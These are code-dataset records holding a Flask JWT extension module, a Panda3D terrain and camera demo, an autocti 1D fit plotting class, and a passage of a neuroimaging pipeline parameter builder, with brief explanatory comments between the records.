+{"seq_id":"593393130","text":"from flask import jsonify\nfrom flask_jwt_extended import jwt_required, jwt_optional\n\nfrom backend.core.backend_app import FormsBackend\n\n\ndef application_extend(application: FormsBackend):\n from backend.core.models import Users\n from backend.core.enums import UsersRole\n from flask_jwt_extended import get_current_user\n\n @application.jwt.token_in_blacklist_loader\n def check_if_token_in_blacklist(decrypted_token):\n jti = decrypted_token['jti']\n\n model = application.orm.get_token_by_jti(jti)\n if not model:\n return False\n if model.revoked:\n return True\n\n return False\n\n @application.jwt.user_loader_callback_loader\n def fetch_user(identity) -> Users:\n user_auth = application.orm.get_user_auth_by_email(identity)\n\n return user_auth.user\n\n @application.app.before_request\n @jwt_optional\n def log_request():\n from flask import request\n\n user: Users = get_current_user()\n if user is not None:\n roles = [UsersRole.MANAGER, UsersRole.STAFF]\n\n if user.role == roles[0].value or user.role == roles[1].value:\n method = request.method\n path = request.path\n data = request.get_json()\n\n application.orm.add_log(user.id, user.role, method, path, data)\n\n @application.app.errorhandler(422)\n def handle_error(err):\n headers = err.data.get(\"headers\", None)\n messages = err.data.get(\"messages\", [\"Invalid request.\"])\n\n msg_list = []\n if isinstance(messages, list):\n msg_list = messages\n else:\n for value in messages.values():\n msg_list += value\n\n res = jsonify({'message': msg_list})\n if headers:\n return res, err.code, headers\n else:\n return res, err.code\n","sub_path":"backend/core/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
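The token_in_blacklist_loader in the record above only reads the model's revoked flag; something else has to set it. A sketch of the revocation side, assuming a hypothetical ORM helper revoke_token_by_jti and the pre-4.0 flask-jwt-extended API (get_raw_jwt) that the loader above implies; it would live inside application_extend, where application is in scope.

from flask import jsonify
from flask_jwt_extended import jwt_required, get_raw_jwt

@application.app.route('/logout', methods=['DELETE'])
@jwt_required
def logout():
    jti = get_raw_jwt()['jti']                 # id of the token being revoked
    application.orm.revoke_token_by_jti(jti)   # assumed helper: sets model.revoked = True
    return jsonify({'message': 'Token revoked'}), 200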
+{"seq_id":"453860106","text":"from direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\nfrom panda3d.core import LPoint3, LVector3\nfrom direct.gui.OnscreenText import OnscreenText\nfrom direct.task.Task import Task\nfrom math import sin, cos, pi\nfrom random import randint, choice, random\nfrom direct.interval.MetaInterval import Sequence\nfrom direct.interval.FunctionInterval import Wait, Func\nimport sys\nfrom direct.showbase.ShowBase import ShowBase\nfrom direct.task import Task\nfrom direct.interval.LerpInterval import LerpTexOffsetInterval, LerpPosInterval\nfrom pandac.PandaModules import CompassEffect, CollisionTraverser, CollisionNode\nfrom pandac.PandaModules import CollisionSphere, CollisionHandlerQueue, Material\nfrom pandac.PandaModules import VBase4, VBase3, TransparencyAttrib\nfrom panda3d.core import AmbientLight, DirectionalLight, Vec4, Vec3, Fog\nfrom panda3d.core import BitMask32, Texture, TextNode, TextureStage\nfrom panda3d.core import NodePath, PandaNode\nfrom direct.gui.OnscreenText import OnscreenText\n\n\n\n\n\nclass MyApp(ShowBase):\n\tdef __init__(self):\n\t\tShowBase.__init__(self)\n\t\t#base.disableMouse()\n\t\tself.keys = {\"turnLeft\": 0, \"turnRight\": 0,\n\t\t\t\t\"accel\": 0, \"fire\": 0}\n\t\tself.accept(\"arrow_left\", self.setKey, [\"turnLeft\", 1])\n\t\tself.accept(\"arrow_left-up\", self.setKey, [\"turnLeft\", 0])\n\t\tself.accept(\"arrow_right\", self.setKey, [\"turnRight\", 1])\n\t\tself.accept(\"arrow_right-up\", self.setKey, [\"turnRight\", 0])\n\t\tself.accept(\"arrow_up\", self.setKey, [\"accel\", 1])\n\t\tself.accept(\"arrow_up-up\", self.setKey, [\"accel\", 0])\n\t\tself.accept(\"space\", self.setKey, [\"fire\", 1])\n\t\tself.accept('escape', sys.exit)\n\t\tself.worldsize = 1024\n\t\t#m = loader.loadModel(\"mymodel.egg\")\n\t\t#myTexture = loader.loadTexture(\"texture2.jpeg\")\n\t\t# terrain = GeoMipTerrain(\"mySimpleTerrain\")\n\t\t# terrain.setHeightfield(\"heightmap.bmp\")\n\t\t# terrain.setColorMap(\"texture2.jpeg\")\n\t\t# root = terrain.getRoot()\n\t\t# root.reparentTo(render)\n\t\t# root.setSz(100)\n\t\t# terrain.generate()\n\n\t\t#water\n\t\tself.water = self.loader.loadModel('square.egg')\n\t\tself.water.setSx(self.worldsize)\n\t\tself.water.setSy(self.worldsize)\n\t\tself.water.setPos(self.worldsize/6,self.worldsize/6,70) # sea level\n\t\tself.water.setTransparency(TransparencyAttrib.MAlpha) \n\t\tnewTS = TextureStage('1')\n\t\tself.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\tself.water.setTexScale(newTS,4)\n\t\tself.water.reparentTo(self.render)\n\t\tLerpTexOffsetInterval(self.water, 200, (1,0),(0,0), textureStage=newTS).loop()\n\n\n\t\tterrain = GeoMipTerrain(\"mySimpleTerrain\")\n\t\tterrain.setHeightfield(\"heightmap5.jpeg\")\n\t\tterrain.setBruteforce(True)\n\t\tterrain.getRoot().reparentTo(render)\n\t\tterrain.setColorMap(\"texture2.jpeg\")\n\t\tterrain.getRoot().setSz(200)\n\t\tterrain.generate()\n\t\tself.camera.setPos(1 , 1, 3)\n\t\t#self.disableMouse()\n\t\t#base.useTrackball()\n\t\t#m.reparentTo(render)\n\t # Make the mouse invisible, turn off normal mouse controls\n\t\tself.disableMouse()\n\t\tprops = WindowProperties()\n\t\tprops.setCursorHidden(True)\n\t\tself.win.requestProperties(props)\n\t\tself.camLens.setFov(60)\n\t\t# Set the current viewing target\n\t\tself.focus = LVector3(500, -55, 500)\n\t\tself.heading = 300\n\t\tself.pitch = 0\n\t\tself.mousex = 0\n\t\tself.mousey = 0\n\t\tself.last = 0\n\t\tself.mousebtn = [0, 0, 0]\n\t\t#moveTask(self,)\n\t\t# Start the camera control 
task:\n\t\ttaskMgr.add(self.controlCamera, \"camera-task\")\n\t\tself.accept(\"escape\", sys.exit, [0])\n\t\tself.accept(\"mouse1\", self.setMouseBtn, [0, 1])\n\t\tself.accept(\"mouse1-up\", self.setMouseBtn, [0, 0])\n\t\tself.accept(\"mouse2\", self.setMouseBtn, [1, 1])\n\t\tself.accept(\"mouse2-up\", self.setMouseBtn, [1, 0])\n\t\tself.accept(\"mouse3\", self.setMouseBtn, [2, 1])\n\t\tself.accept(\"mouse3-up\", self.setMouseBtn, [2, 0])\n\t\t#self.accept(\"enter\", self.toggleShader)\n\t\t#self.accept(\"j\", self.rotateLight, [-1])\n\t\t#self.accept(\"k\", self.rotateLight, [1])\n\t\tself.accept(\"arrow_left\", self.rotateCam, [-1])\n\t\tself.accept(\"arrow_right\", self.rotateCam, [1])\n\t\t\n\t\t#terrain.setTexture(myTexture)\n\t\tdef updateTask(task):\n\t\t\tterrain.update()\n\t\t\treturn task.cont\n\t\t\n\t\ttaskMgr.add(updateTask, \"update\")\n\t\t#taskMgr.add(waterlevel,\"updatewater\")\n\t\ttaskMgr.add(self.moveTask,\"move\")\n\t\ttaskMgr.add(self.waterlevel,\"water\")\n\t\t#taskMgr.add(moveTask,\"move\")\n\tx = 1\n\tA = KeyboardButton.ascii_key('a')\n\tP = KeyboardButton.ascii_key('p')\n\tD = KeyboardButton.ascii_key('d')\n\tW = KeyboardButton.ascii_key('w')\n\tS = KeyboardButton.ascii_key('s')\n\tU = KeyboardButton.ascii_key('u')\n\tL = KeyboardButton.ascii_key('l')\n\tdef waterlevel(self, task):\n\t\tis_down = base.mouseWatcherNode.is_button_down\n\t\tif is_down(self.P):\n\n\t\t\tself.water.setPos(self.worldsize/6,self.worldsize/6,70+self.x) # sea level\n\t\t\tself.x = self.x + 0.1\n\t\t\t#newTS = TextureStage('1')\n\t\t\t#self.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\t\t#self.water.setTransparency(TransparencyAttrib.MAlpha) \n\t\t\t#newTS = TextureStage('1')\n\t\t\t#self.water.setTexture(newTS,self.loader.loadTexture('water.png'))\n\t\t\t#self.water.setTexScale(newTS,100)\n\t\t\t#self.water.setColorMap('water.png')\n\t\t\t#LerpTexOffsetInterval(self.water, 200, (1,0),(0,0), textureStage=newTS).loop()\n\t\t\tself.water.reparentTo(self.render)\n\t\treturn Task.cont\n\tdef rotateCam(self, offset):\n\t\tself.heading = self.heading - offset * 10\n\tdef setMouseBtn(self, btn, value):\n\t\tself.mousebtn[btn] = value\n\tdef setKey(self, key, val):\n\t\tself.keys[key] = val\t\n\tdef moveTask(self, task):\n\t\tis_down = base.mouseWatcherNode.is_button_down\n\t\tdt = globalClock.getDt()\n\t\tif is_down(self.A):\n\t\t\tself.camera.setX(self.camera, -20 * dt)\n\t\tif is_down(self.D):\n\t\t\tself.camera.setX(self.camera, +20 * dt)\n\t\tif is_down(self.W):\n\t\t\tself.camera.setY(self.camera, +20 * dt)\n\t\tif is_down(self.S):\n\t\t\tself.camera.setY(self.camera, -20 * dt)\n\t\tif is_down(self.U):\n\t\t\tself.camera.setZ(self.camera, +20 * dt)\n\t\tif is_down(self.L):\n\t\t\tself.camera.setZ(self.camera, -20 * dt)\n\t\treturn task.cont\n\tdef controlCamera(self, task):\n\t# figure out how much the mouse has moved (in pixels)\n\t\tmd = self.win.getPointer(0)\n\t\tx = md.getX()\n\t\ty = md.getY()\n\t\tif self.win.movePointer(0, 100, 100):\n\t\t\tself.heading = self.heading - (x - 100) * 0.2\n\t\t\tself.pitch = self.pitch - (y - 100) * 0.2\n\t\tif self.pitch < -80:\n\t\t\tself.pitch = -80\n\t\tif self.pitch > 80:\n\t\t\tself.pitch = 80\n\t\tself.camera.setHpr(self.heading, self.pitch, 0)\n\t\tdir = self.camera.getMat().getRow3(1)\n\t\telapsed = task.time - self.last\n\t\tif self.last == 0:\n\t\t\telapsed = 0\n\t\tif self.mousebtn[0]:\n\t\t\tself.focus = self.focus + dir * elapsed * 60\n\t\tif self.mousebtn[1] or self.mousebtn[2]:\n\t\t\tself.focus = self.focus - dir * 
elapsed * 60\n\t\tself.camera.setPos(self.focus - (dir * 5))\n\t\tif self.camera.getX() < -650.0:\n\t\t\tself.camera.setX(-650)\n\t\tif self.camera.getX() > 650.0:\n\t\t\tself.camera.setX(650)\n\t\tif self.camera.getY() < -650.0:\n\t\t\tself.camera.setY(-650)\n\t\tif self.camera.getY() > 650.0:\n\t\t\tself.camera.setY(650)\n\t\tif self.camera.getZ() < 10.0:\n\t\t\tself.camera.setZ(10)\n\t\tif self.camera.getZ() > 600.0:\n\t\t\tself.camera.setZ(600)\n\t\tself.focus = self.camera.getPos() + (dir * 5)\n\t\tself.last = task.time\n\t\treturn Task.cont\napp = MyApp()\napp.run()\n\n\n\n","sub_path":"panda.py","file_name":"panda.py","file_ext":"py","file_size_in_byte":7049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
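The camera bounds in controlCamera above are enforced with four pairs of if-statements; the same limits can be expressed with a clamp helper. A sketch of an equivalent refactor, not a change to the file itself:

def clamp(value, lo, hi):
    return max(lo, min(hi, value))

# equivalent to the paired if-statements in controlCamera:
#   self.camera.setX(clamp(self.camera.getX(), -650.0, 650.0))
#   self.camera.setY(clamp(self.camera.getY(), -650.0, 650.0))
#   self.camera.setZ(clamp(self.camera.getZ(), 10.0, 600.0))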
+{"seq_id":"8990909","text":"import numpy as np\r\nfrom typing import Callable, Optional\r\n\r\nimport autoarray.plot as aplt\r\n\r\nfrom autoarray.plot.auto_labels import AutoLabels\r\n\r\nfrom autocti.plot.abstract_plotters import Plotter\r\nfrom autocti.dataset_1d.fit import FitDataset1D\r\n\r\n\r\nclass FitDataset1DPlotter(Plotter):\r\n def __init__(\r\n self,\r\n fit: FitDataset1D,\r\n mat_plot_1d: aplt.MatPlot1D = aplt.MatPlot1D(),\r\n visuals_1d: aplt.Visuals1D = aplt.Visuals1D(),\r\n include_1d: aplt.Include1D = aplt.Include1D(),\r\n ):\r\n \"\"\"\r\n Plots the attributes of `FitDataset1D` objects using the matplotlib method `line()` and many other matplotlib\r\n functions which customize the plot's appearance.\r\n\r\n The `mat_plot_1d` attribute wraps matplotlib function calls to make the figure. By default, the settings\r\n passed to every matplotlib function called are those specified in the `config/visualize/mat_wrap/*.ini` files,\r\n but a user can manually input values into `MatPlot1d` to customize the figure's appearance.\r\n\r\n Overlaid on the figure are visuals, contained in the `Visuals1D` object. Attributes may be extracted from\r\n the `Imaging` and plotted via the visuals object, if the corresponding entry is `True` in the `Include1D`\r\n object or the `config/visualize/include.ini` file.\r\n\r\n Parameters\r\n ----------\r\n fit\r\n The fit to the dataset of a 1D dataset the plotter plots.\r\n mat_plot_1d\r\n Contains objects which wrap the matplotlib function calls that make 1D plots.\r\n visuals_1d\r\n Contains 1D visuals that can be overlaid on 1D plots.\r\n include_1d\r\n Specifies which attributes of the `ImagingCI` are extracted and plotted as visuals for 1D plots.\r\n \"\"\"\r\n self.fit = fit\r\n\r\n super().__init__(\r\n dataset=fit.dataset,\r\n mat_plot_1d=mat_plot_1d,\r\n include_1d=include_1d,\r\n visuals_1d=visuals_1d,\r\n )\r\n\r\n def get_visuals_1d(self) -> aplt.Visuals1D:\r\n return self.visuals_1d\r\n\r\n @property\r\n def extract_region_from(self) -> Callable:\r\n return self.fit.dataset.layout.extract_region_from\r\n\r\n def figures_1d(\r\n self,\r\n region: Optional[str] = None,\r\n data: bool = False,\r\n data_logy: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n pre_cti_data: bool = False,\r\n post_cti_data: bool = False,\r\n residual_map: bool = False,\r\n residual_map_logy: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n ):\r\n \"\"\"\r\n Plots the individual attributes of the plotter's `FitDataset1D` object in 1D.\r\n\r\n The API is such that every plottable attribute of the `FitDataset1D` object is an input parameter of type bool\r\n of the function, which if switched to `True` means that it is plotted.\r\n\r\n Parameters\r\n ----------\r\n region\r\n The region on the 1D dataset where data is extracted and binned {fpr\", \"eper\"}\r\n data\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars.\r\n data_logy\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars and the y-axis on a log10 scale.\r\n noise_map\r\n Whether to make a 1D plot (via `plot`) of the noise map.\r\n signal_to_noise_map\r\n Whether to make a 1D plot (via `plot`) of the signal-to-noise map.\r\n pre_cti_data\r\n Whether to make a 1D plot (via `plot`) of the pre-cti data.\r\n post_cti_data\r\n 
Whether to make a 1D plot (via `plot`) of the post-cti data.\r\n residual_map\r\n Whether to make a 1D plot (via `plot`) of the residual map, with the noise-map values included as error\r\n bars.\r\n residual_map_logy\r\n Whether to make a 1D plot (via `plot`) of the residual map, with the noise-map values included as error\r\n bars and the y-axis on a log10 scale.\r\n normalized_residual_map\r\n Whether to make a 1D plot (via `plot`) of the normalized residual map.\r\n chi_squared_map\r\n Whether to make a 1D plot (via `plot`) of the chi-squared map.\r\n \"\"\"\r\n\r\n suffix = f\"_{region}\" if region is not None else \"\"\r\n title_str = self.title_str_from(region=region)\r\n\r\n y_errors = self.extract_region_from(array=self.fit.noise_map, region=region)\r\n y_extra = self.extract_region_from(array=self.fit.model_data, region=region)\r\n\r\n if data:\r\n y = self.extract_region_from(array=self.fit.data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar\",\r\n y_errors=y_errors,\r\n y_extra=y_extra,\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Data {title_str}\",\r\n yunit=\"e-\",\r\n filename=f\"data{suffix}\",\r\n ),\r\n )\r\n\r\n if data_logy:\r\n y = self.extract_region_from(array=self.fit.data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar_logy\",\r\n y_errors=y_errors,\r\n y_extra=y_extra,\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Data {title_str} [log10]\",\r\n yunit=\"e-\",\r\n filename=f\"data_logy{suffix}\",\r\n ),\r\n )\r\n\r\n if noise_map:\r\n y = self.extract_region_from(array=self.fit.noise_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Noise-Map\",\r\n yunit=\"e-\",\r\n filename=f\"noise_map{suffix}\",\r\n ),\r\n )\r\n\r\n if signal_to_noise_map:\r\n y = self.extract_region_from(\r\n array=self.fit.signal_to_noise_map, region=region\r\n )\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Signal-To-Noise Map\",\r\n yunit=\"\",\r\n filename=f\"signal_to_noise_map{suffix}\",\r\n ),\r\n )\r\n\r\n if residual_map:\r\n y = self.extract_region_from(array=self.fit.residual_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar\",\r\n y_errors=y_errors,\r\n y_extra=np.zeros(shape=y.shape),\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Residual Map {title_str}\",\r\n yunit=\"e-\",\r\n filename=f\"residual_map{suffix}\",\r\n ),\r\n )\r\n\r\n if residual_map_logy:\r\n y = self.extract_region_from(array=self.fit.residual_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n plot_axis_type_override=\"errorbar_logy\",\r\n y_errors=y_errors,\r\n y_extra=1.0001 * np.zeros(shape=y.shape),\r\n text_manual_dict=self.text_manual_dict_from(region=region),\r\n 
text_manual_dict_y=self.text_manual_dict_y_from(region=region),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=f\"Residual Map {title_str}\",\r\n ylabel=\"e-\",\r\n filename=f\"residual_map_logy{suffix}\",\r\n ),\r\n )\r\n\r\n if normalized_residual_map:\r\n y = self.extract_region_from(\r\n array=self.fit.normalized_residual_map, region=region\r\n )\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Normalized Residual Map\",\r\n yunit=r\"\\sigma\",\r\n filename=f\"normalized_residual_map{suffix}\",\r\n ),\r\n )\r\n\r\n if chi_squared_map:\r\n y = self.extract_region_from(array=self.fit.chi_squared_map, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Chi-Squared Map\",\r\n yunit=r\"\\chi^2\",\r\n filename=f\"chi_squared_map{suffix}\",\r\n ),\r\n )\r\n\r\n if pre_cti_data:\r\n y = self.extract_region_from(array=self.fit.pre_cti_data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"Pre CTI Data\",\r\n yunit=\"e-\",\r\n filename=f\"pre_cti_data{suffix}\",\r\n ),\r\n )\r\n\r\n if post_cti_data:\r\n y = self.extract_region_from(array=self.fit.post_cti_data, region=region)\r\n\r\n self.mat_plot_1d.plot_yx(\r\n y=y,\r\n x=range(len(y)),\r\n visuals_1d=self.get_visuals_1d(),\r\n auto_labels=AutoLabels(\r\n title=\"CI Post CTI Image\",\r\n yunit=\"e-\",\r\n filename=f\"post_cti_data{suffix}\",\r\n ),\r\n )\r\n\r\n def subplot(\r\n self,\r\n data: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n pre_cti_data: bool = False,\r\n post_cti_data: bool = False,\r\n residual_map: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n auto_filename=\"subplot_fit\",\r\n **kwargs,\r\n ):\r\n \"\"\"\r\n Plots the individual attributes of the plotter's `FitDataset1D` object in 1D on a subplot.\r\n\r\n The API is such that every plottable attribute of the `FitDataset1D` object is an input parameter of type bool\r\n of the function, which if switched to `True` means that it is included on the subplot.\r\n\r\n Parameters\r\n ----------\r\n data\r\n Whether to make a 1D plot (via `plot`) of the image data extracted and binned over the region, with the\r\n noise-map values included as error bars.\r\n noise_map\r\n Whether to include a 1D plot (via `plot`) of the noise map.\r\n signal_to_noise_map\r\n Whether to include a 1D plot (via `plot`) of the signal-to-noise map.\r\n pre_cti_data\r\n Whether to include a 1D plot (via `plot`) of the pre-cti data.\r\n post_cti_data\r\n Whether to include a 1D plot (via `plot`) of the post-cti data.\r\n residual_map\r\n Whether to include a 1D plot (via `plot`) of the residual map.\r\n normalized_residual_map\r\n Whether to include a 1D plot (via `plot`) of the normalized residual map.\r\n chi_squared_map\r\n Whether to include a 1D plot (via `plot`) of the chi-squared map.\r\n \"\"\"\r\n\r\n region = kwargs.get(\"region\", None)\r\n suffix = f\"_{region}\" if region is not None else \"\"\r\n\r\n self._subplot_custom_plot(\r\n data=data,\r\n noise_map=noise_map,\r\n signal_to_noise_map=signal_to_noise_map,\r\n pre_cti_data=pre_cti_data,\r\n post_cti_data=post_cti_data,\r\n residual_map=residual_map,\r\n normalized_residual_map=normalized_residual_map,\r\n 
chi_squared_map=chi_squared_map,\r\n auto_labels=AutoLabels(\r\n yunit=\"e-\",\r\n xlabel=\"Pixel No.\",\r\n filename=f\"{auto_filename}{suffix}\",\r\n ),\r\n )\r\n\r\n def subplot_fit(self, region: Optional[str] = None):\r\n \"\"\"\r\n Standard subplot of the attributes of the plotter's `FitDataset1D` object.\r\n \"\"\"\r\n return self.subplot(\r\n region=region,\r\n data=True,\r\n signal_to_noise_map=True,\r\n pre_cti_data=True,\r\n post_cti_data=True,\r\n normalized_residual_map=True,\r\n chi_squared_map=True,\r\n )\r\n","sub_path":"autocti/dataset_1d/plot/fit_plotters.py","file_name":"fit_plotters.py","file_ext":"py","file_size_in_byte":13678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
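Typical driver code for the plotter in the record above, using only the methods it defines; constructing the FitDataset1D instance is assumed here and depends on the wider autocti API.

from autocti.dataset_1d.plot.fit_plotters import FitDataset1DPlotter

plotter = FitDataset1DPlotter(fit=fit)  # `fit` assumed to be a FitDataset1D
plotter.figures_1d(region="fpr", data=True, residual_map=True)  # individual figures
plotter.subplot_fit(region="eper")                              # standard subplot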
+{"seq_id":"233561114","text":"\"\"\"\nBuilds, validates, and excecutes parameters for the HCP script \n/opt/HCP-Pipelines/PreFreeSurfer/PreFreeSurferPipeline.sh\npart of the hcp-struct gear\n\"\"\"\nimport os\nimport os.path as op\nfrom collections import OrderedDict\n\nfrom tr import tr\nfrom utils.gear_preliminaries import create_sanitized_filepath\n\nfrom .common import build_command_list, exec_command\n\n\ndef build(context):\n environ = context.gear_dict[\"environ\"]\n config = context.config\n inputs = context._invocation[\"inputs\"]\n\n params = OrderedDict()\n\n # Check for all required inputs. Necessary for API calls\n # TODO: this should be taken care of in gear_preliminaries\n missing = []\n for req in [\"T1\", \"T2\"]:\n if req not in inputs.keys():\n missing.append(req)\n if len(missing) > 0:\n raise Exception(\n \"Please provide the required input file(s), {}!\".format(missing)\n )\n\n params[\"path\"] = context.work_dir\n params[\"subject\"] = config[\"Subject\"]\n params[\"t1\"] = create_sanitized_filepath(context.get_input_path(\"T1\"))\n params[\"t2\"] = create_sanitized_filepath(context.get_input_path(\"T2\"))\n\n # Pre-Fill certain parameters with \"NONE\"\n None_Params = [\n \"fmapmag\",\n \"fmapphase\",\n \"fmapgeneralelectric\",\n \"SEPhaseNeg\",\n \"SEPhasePos\",\n \"seechospacing\",\n \"seunwarpdir\",\n \"echodiff\",\n \"t1samplespacing\",\n \"t2samplespacing\",\n \"gdcoeffs\",\n \"avgrdcmethod\",\n \"topupconfig\",\n ]\n # the parameter \"--bfsigma\" is not accounted for\n for p in None_Params:\n params[p] = \"NONE\"\n\n if \"DwellTime\" in inputs[\"T1\"][\"object\"][\"info\"].keys():\n dwell_time = inputs[\"T1\"][\"object\"][\"info\"][\"DwellTime\"]\n # format dwell_time to 15 places\n params[\"t1samplespacing\"] = format(dwell_time, \".15f\")\n if \"DwellTime\" in inputs[\"T2\"][\"object\"][\"info\"].keys():\n dwell_time = inputs[\"T2\"][\"object\"][\"info\"][\"DwellTime\"]\n # format dwell_time to 15 places\n params[\"t2samplespacing\"] = format(dwell_time, \".15f\")\n\n # HCP PIPE DIR Templates\n # MNI0.7mm template\n params[\"t1template\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \".nii.gz\"\n )\n params[\"t1template2mm\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T1_2mm.nii.gz\"\n ) # Brain extracted MNI0.7mm template\n params[\"t1templatebrain\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \"_brain.nii.gz\"\n )\n\n params[\"t2template\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T2_\"\n + config[\"TemplateSize\"]\n + \".nii.gz\"\n ) # MNI0.7mm T2wTemplate\n params[\"t2templatebrain\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T2_\"\n + config[\"TemplateSize\"]\n + \"_brain.nii.gz\"\n ) # Brain extracted MNI0.7mm T2wTemplate\n params[\"t2template2mm\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T2_2mm.nii.gz\"\n ) # MNI2mm T2wTemplate\n params[\"templatemask\"] = (\n environ[\"HCPPIPEDIR_Templates\"]\n + \"/MNI152_T1_\"\n + config[\"TemplateSize\"]\n + \"_brain_mask.nii.gz\"\n ) # Brain mask MNI0.7mm template\n params[\"template2mmmask\"] = (\n environ[\"HCPPIPEDIR_Templates\"] + \"/MNI152_T1_2mm_brain_mask_dil.nii.gz\"\n ) # MNI2mm template\n params[\"brainsize\"] = config[\"BrainSize\"]\n params[\"fnirtconfig\"] = (\n environ[\"HCPPIPEDIR_Config\"] + \"/T1_2_MNI152_2mm.cnf\"\n ) # FNIRT 2mm T1w Config\n\n # Parse Inputs\n # If SiemensFieldMap\n if (\"SiemensGREMagnitude\" in inputs.keys()) and (\n 
\"SiemensGREPhase\" in inputs.keys()\n ):\n params[\"fmapmag\"] = context.get_input_path(\"SiemensGREMagnitude\")\n params[\"fmapphase\"] = context.get_input_path(\"SiemensGREPhase\")\n params[\"avgrdcmethod\"] = \"SiemensFieldMap\"\n if (\"EchoTime\" in inputs[\"SiemensGREMagnitude\"][\"object\"][\"info\"].keys()) and (\n \"EchoTime\" in inputs[\"SiemensGREPhase\"][\"object\"][\"info\"].keys()\n ):\n echotime1 = inputs[\"SiemensGREMagnitude\"][\"object\"][\"info\"][\"EchoTime\"]\n echotime2 = inputs[\"SiemensGREPhase\"][\"object\"][\"info\"][\"EchoTime\"]\n params[\"echodiff\"] = format((echotime2 - echotime1) * 1000.0, \".15f\")\n # Else if TOPUP\n elif (\"SpinEchoNegative\" in inputs.keys()) and (\n \"SpinEchoPositive\" in inputs.keys()\n ):\n params[\"avgrdcmethod\"] = \"TOPUP\"\n SpinEchoPhase1 = context.get_input_path(\"SpinEchoPositive\")\n SpinEchoPhase2 = context.get_input_path(\"SpinEchoNegative\")\n # Topup config if using TOPUP, set to NONE if using regular FIELDMAP\n params[\"topupconfig\"] = environ[\"HCPPIPEDIR_Config\"] + \"/b02b0.cnf\"\n if (\n \"EffectiveEchoSpacing\"\n in inputs[\"SpinEchoPositive\"][\"object\"][\"info\"].keys()\n ):\n SEP_object_info = inputs[\"SpinEchoPositive\"][\"object\"][\"info\"]\n SEN_object_info = inputs[\"SpinEchoNegative\"][\"object\"][\"info\"]\n seechospacing = SEP_object_info[\"EffectiveEchoSpacing\"]\n params[\"seechospacing\"] = format(seechospacing, \".15f\")\n\n if (\"PhaseEncodingDirection\" in SEP_object_info.keys()) and (\n \"PhaseEncodingDirection\" in SEN_object_info.keys()\n ):\n pedirSE1 = SEP_object_info[\"PhaseEncodingDirection\"]\n pedirSE2 = SEN_object_info[\"PhaseEncodingDirection\"]\n pedirSE1 = tr(\"ijk\", \"xyz\", pedirSE1)\n pedirSE2 = tr(\"ijk\", \"xyz\", pedirSE2)\n # Check SpinEcho phase-encoding directions\n if ((pedirSE1, pedirSE2) == (\"x\", \"x-\")) or (\n (pedirSE1, pedirSE2) == (\"y\", \"y-\")\n ):\n params[\"SEPhasePos\"] = SpinEchoPhase1\n params[\"SEPhaseNeg\"] = SpinEchoPhase2\n elif ((pedirSE1, pedirSE2) == (\"x-\", \"x\")) or (\n (pedirSE1, pedirSE2) == (\"y-\", \"y\")\n ):\n params[\"SEPhasePos\"] = SpinEchoPhase2\n params[\"SEPhaseNeg\"] = SpinEchoPhase1\n context.log.warning(\n \"SpinEcho 